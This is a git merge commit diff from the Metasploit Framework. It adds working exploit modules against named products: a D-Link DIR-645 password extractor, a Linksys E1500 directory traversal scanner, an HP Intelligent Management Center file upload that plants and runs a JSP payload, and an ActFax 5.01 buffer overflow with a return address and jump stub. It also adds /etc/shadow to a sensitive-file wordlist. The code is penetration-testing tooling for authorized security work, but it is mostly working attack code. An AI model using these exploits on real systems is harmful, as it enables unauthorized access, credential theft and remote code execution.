Merge branch 'master' of https://github.com/rapid7/metasploit-framework

2013-03-25 19:09:42 +01:00
parent 2d5a0d6916 dcce23d23d
commit 393d5d8bf5
8 changed files with 430 additions and 8 deletions
@@ -1,4 +1,5 @@
 /etc/passwd
+/etc/shadow
 /etc/groups
 /etc/mysql.conf
 /etc/mysql/my.cnf
@@ -10,4 +11,5 @@
 /etc/motd
 /etc/fstab
 /etc/inetd.conf
-/etc/xinetd.conf
+/etc/xinetd.conf
+/proc/version
@@ -0,0 +1,95 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        => 'DLink DIR 645 Password Extractor',
+			'Description' => %q{
+					This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.
+				With this vulnerability you are able to extract the password for the remote
+				management.
+			},
+			'References'  =>
+				[
+					[ 'OSVDB', '90733' ],
+					[ 'BID', '58231' ],
+					[ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ]
+				],
+			'Author'      =>
+				[
+					'Roberto Paleari <roberto@greyhats.it>', # Vulnerability discovery
+					'Michael Messner <devnull@s3cur1ty.de>'	 # Metasploit module
+				],
+			'License'     => MSF_LICENSE
+		)
+	end
+
+	def run
+
+		vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")
+
+		#Curl request:
+		#curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep "\<name|password"
+
+		#download configuration
+		begin
+			res = send_request_cgi({
+				'uri' => '/getcfg.php',
+				'method' => 'POST',
+				'vars_post' =>
+					{
+						'SERVICES' => 'DEVICE.ACCOUNT'
+					}
+				})
+
+			return if res.nil?
+			return if (res.headers['Server'].nil? or res.headers['Server'] !~ /DIR-645 Ver 1.0/)
+			return if (res.code == 404)
+
+			if res.body =~ /<password>(.*)<\/password>/
+				print_good("#{rhost}:#{rport} - credentials successfully extracted")
+
+				#store all details as loot -> there is some usefull stuff in the response
+				loot = store_loot("dlink.dir645.config","text/plain",rhost, res.body)
+				print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}")
+
+				res.body.each_line do |line|
+					if line =~ /<name>(.*)<\/name>/
+						@user = $1
+						next
+					end
+					if line =~ /<password>(.*)<\/password>/
+						pass = $1
+						vprint_good("user: #{@user}")
+						vprint_good("pass: #{pass}")
+
+					report_auth_info(
+						:host => rhost,
+						:port => rport,
+						:sname => 'http',
+						:user => @user,
+						:pass => pass,
+						:active => true
+					)
+					end
+				end
+			end
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return
+		end
+
+
+	end
+end
@@ -0,0 +1,129 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'        => 'Linksys E1500 Directory Traversal Vulnerability',
+			'Description' => %q{
+					This module exploits a directory traversal vulnerability which is present in
+				different Linksys home routers, like the E1500.
+			},
+			'References'  =>
+				[
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ],
+					[ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ],
+					[ 'BID', '57760' ],
+					[ 'OSVDB', '89911' ],
+					[ 'EDB', '24475' ]
+				],
+			'Author'      => [ 'm-1-k-3' ],
+			'License'     => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				OptPath.new('SENSITIVE_FILES',  [ true, "File containing senstive files, one per line",
+					File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]),
+				OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
+				OptString.new('PASSWORD',[ true, 'Password to login with', 'password']),
+
+			], self.class)
+	end
+
+	def extract_words(wordfile)
+		return [] unless wordfile && File.readable?(wordfile)
+		begin
+			words = File.open(wordfile, "rb") do |f|
+				f.read
+			end
+		rescue
+			return []
+		end
+		save_array = words.split(/\r?\n/)
+		return save_array
+	end
+
+	def find_files(file,user,pass)
+		uri = "/apply.cgi"
+		traversal = '../..'
+		data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file
+		res = send_request_cgi({
+			'method'  => 'POST',
+			'uri'     => uri,
+			'authorization' => basic_auth(user,pass),
+			'vars_post' => {
+				"submit_type" => "wsc_method2",
+				"change_action" => "gozila_cgi",
+				"next_page" => traversal << file
+			}
+		})
+
+		#without res.body.length we get lots of false positives
+		if (res and res.code == 200 and res.body.length > 0)
+			print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
+			report_web_vuln({
+					:host => rhost,
+					:port => rport,
+					:vhost => datastore['VHOST'],
+					:path => uri,
+					:pname => data_trav,
+					:risk => 3,
+					:proof => data_trav,
+					:name => self.fullname,
+					:category => "web",
+					:method => "POST"
+			})
+
+			loot = store_loot("linksys.traversal.data","text/plain", rhost, res.body, file)
+			vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
+		elsif (res and res.code)
+			vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}")
+		end
+	end
+
+	def run_host(ip)
+		user = datastore['USERNAME']
+		pass = datastore['PASSWORD']
+
+		vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+
+		#test login
+		begin
+			res = send_request_cgi({
+				'uri' => '/',
+				'method' => 'GET',
+				'authorization' => basic_auth(user,pass)
+			})
+
+			return if res.nil?
+			return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/)
+			return if (res.code == 404)
+
+			if [200, 301, 302].include?(res.code)
+				vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+			else
+				vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+				return
+			end
+
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return
+		end
+
+		extract_words(datastore['SENSITIVE_FILES']).each do |file|
+			find_files(file, user, pass) unless file.empty?
+		end
+	end
+end
@@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
 		)
 		register_options(
 			[
-				Opt::RPORT(80),
 				OptPath.new('FILELIST',  [ true, "File containing sensitive files, one per line",
 					File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]),
 				OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
 					File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_users.txt") ]),
 			], self.class)

-		deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
+		deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
 	end

 	def target_url
@@ -99,8 +99,9 @@ class Metasploit3 < Msf::Auxiliary
 				return :abort
 			end

-		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-		rescue ::Timeout::Error, ::Errno::EPIPE
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+			print_error("#{target_url} - UNREACHABLE")
+			return :abort
 		end
 	end

@@ -176,13 +176,12 @@ class Metasploit3 < Msf::Exploit::Remote

 		#
 		# "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource
-		#
+		#	
 		proc = Proc.new do |cli, req|
+			self.add_resource({'Path' => "/test.mp4", 'Proc' => proc}) rescue nil
 			on_request_uri(cli, req)
 		end

-		self.add_resource({'Path'=>'/test.mp4', 'Proc'=>proc})# rescue nil
-
 	end

 	def on_request_uri(cli, request)
@@ -0,0 +1,115 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'        => 'HP Intelligent Management Center Arbitrary File Upload',
+			'Description' => %q{
+					This module exploits a code execution flaw in HP Intelligent Management Center.
+				The vulnerability exists in the mibFileUpload which is accepting unauthenticated
+				file uploads and handling zip contents in a insecure way. Combining both weaknesses
+				a remote attacker can accomplish arbitrary file upload. This module has been tested
+				successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+			},
+			'Author'       =>
+				[
+					'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+					'juan vazquez' # Metasploit module
+				],
+			'License'     => MSF_LICENSE,
+			'References'  =>
+				[
+					[ 'CVE', '2012-5201' ],
+					[ 'OSVDB', '91026' ],
+					[ 'BID', '58385' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ],
+					[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ]
+				],
+			'Privileged'  => true,
+			'Platform'    => 'win',
+			'Arch' => ARCH_JAVA,
+			'Targets'     =>
+				[
+					[ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Mar 07 2013'))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc'])
+			], self.class)
+	end
+
+	def check
+		res = send_request_cgi({
+			'uri'    => normalize_uri(target_uri.path.to_s, "login.jsf"),
+			'method' => 'GET'
+		})
+
+		if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+			return Exploit::CheckCode::Detected
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		@peer = "#{rhost}:#{rport}"
+
+		# New lines are handled on the vuln app and payload is corrupted
+		jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
+		jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+
+		# Zipping with CM_STORE to avoid errors while zip decompressing
+		# on the Java vulnerable application
+		zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+		zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp)
+
+		post_data = Rex::MIME::Message.new
+		post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")
+
+		# Work around an incompatible MIME implementation
+		data = post_data.to_s
+		data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
+
+		print_status("#{@peer} - Uploading the JSP payload...")
+		res = send_request_cgi({
+			'uri'    => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
+			'method' => 'POST',
+			'data'   => data,
+			'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+			'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}"
+		})
+
+		if res and res.code == 200 and res.body.empty?
+			print_status("#{@peer} - JSP payload uploaded successfully")
+			register_files_for_cleanup(jsp_name)
+		else
+			fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed")
+		end
+
+		print_status("#{@peer} - Executing payload...")
+		send_request_cgi({
+			'uri'    => normalize_uri(jsp_name),
+			'method' => 'GET'
+		})
+
+	end
+
+end
@@ -0,0 +1,82 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'ActFax 5.01 RAW Server Buffer Overflow',
+			'Description'	=> %q{
+					This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW
+				Server can be used to transfer fax messages without any underlying protocols. To
+				note significant fields in the fax being transferred, like the fax number or the
+				recipient, ActFax data fields can be used. This module exploits a buffer overflow
+				in the handling of the @F506 fields due to the insecure usage of strcpy. This
+				module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).
+			},
+			'License'		=> MSF_LICENSE,
+			'Author'		=>
+				[
+					'Craig Freyman', # @cd1zz # discovery and Metasploit module
+					'corelanc0d3r', # Metasploit module
+					'juan vazquez' # Metasploit module cleanup
+				],
+			'References'	=>
+				[
+					[ 'OSVDB', '89944' ],
+					[ 'BID', '57789' ],
+					[ 'EDB', '24467' ],
+					[ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ]
+				],
+			'Platform'	=> 'win',
+			'Payload'	=>
+				{
+					'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40",
+					'DisableNops' => true,
+					'Space' => 1024,
+					'EncoderOptions' =>
+						{
+							'BufferRegister' => 'ECX'
+						}
+				},
+			'Targets'		 =>
+				[
+					[ 'ActFax 5.01 / Windows XP SP3',
+						{
+							'Ret'   	=>	0x77c35459, # push esp # ret # msvcrt.dll
+							'Offset'	=>	1024
+						}
+					],
+				],
+			'Privileged'	 => false,
+			'DisclosureDate' => 'Feb 5 2013',
+			'DefaultTarget'	 => 0))
+
+	end
+
+	def exploit
+		connect
+		p = payload.encoded
+		buffer = p
+		buffer << rand_text(target['Offset'] - p.length)
+		buffer << [target.ret].pack("V")
+		buffer << "\x89\xe1" # mov ecx, esp
+		buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028
+		buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500
+		buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042
+		print_status("Trying target #{target.name}...")
+		sock.put("@F506 "+buffer+"@\r\n\r\n")
+		disconnect
+	end
+end
+